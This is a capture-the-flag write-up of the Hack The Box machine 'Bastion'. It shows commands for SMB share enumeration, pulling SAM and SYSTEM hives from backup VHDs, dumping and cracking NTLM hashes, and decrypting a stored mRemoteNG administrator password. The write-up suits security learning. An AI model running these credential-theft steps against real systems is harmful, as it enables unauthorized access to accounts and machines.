Windows Privilege Escalation-Stored Password in mRemoteNG
In this article, I will explain Bastion Room in HTB. This room was not hard. However, I spent a lot of time on this room since the file size that I pull is about 5Gb. Lets start with port scanning with nmap. Since in HTB, machines are closed to ping scan, we are using -Pn switch.
nmap -Pn -sV 10.10.10.143open ports are 22, 135,139,445.
The machine is windows and most probably, openssh is running on this server.
lets make an smb enumeration with smbclient.
smbclient -L 10.10.10.134
I am looking all of them since there may be a surprise. Not surprizingly, Backups has some shared data.
I am using smbclient again.
smbclient \\\\10.10.10.134\\Backups
There is 2 vhd files. These files are virtual hard disk files. They may be useful. I will pull those data into my local machine. I have tried to get these files, but I couldnt. Thus, I have mount this disk into my local machine by using,
mount -t cifs //10.10.10.134/backups /mnt -o user=,password=I can use guessmount, but it takes too much time and again and again I got an error. Thus, I pull the vhd files to my windows virtual machine by using python web server.
After some time, I got the disk files.
I move around the disk. And I find SAM and SYSTEM files in Windows\System32\Config folder for this machine. Then, I have moved those file by using scp,
scp SAM kali@192.168.253.130:/home/kali/HTB/BastionBy using SAM, SECURITY and SYSTEM files,
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCALI got the ntlm hashes. I am using John to crack the passwords.
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txtI got the password for L4mpje user. Lets make an ssh connection,
ssh L4mpje@10.10.10.134Lets move around the folders. We see mRemoteNG. We can use this. For remote connection applications, the applications may create a vulnerability. They store credentials. I do some research, and I have found the location that passwords stored.
C:\Users\L4mpje\Appdata\Roaming\mRemoteNG\confCons.xml
I am looking for some credentials. I have seen administator password hash. Bingoo!
I am doing some research,
I have found this article,
and I am using
by
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
I got the password. By using ssh, I am connecting the machine and get root flag.
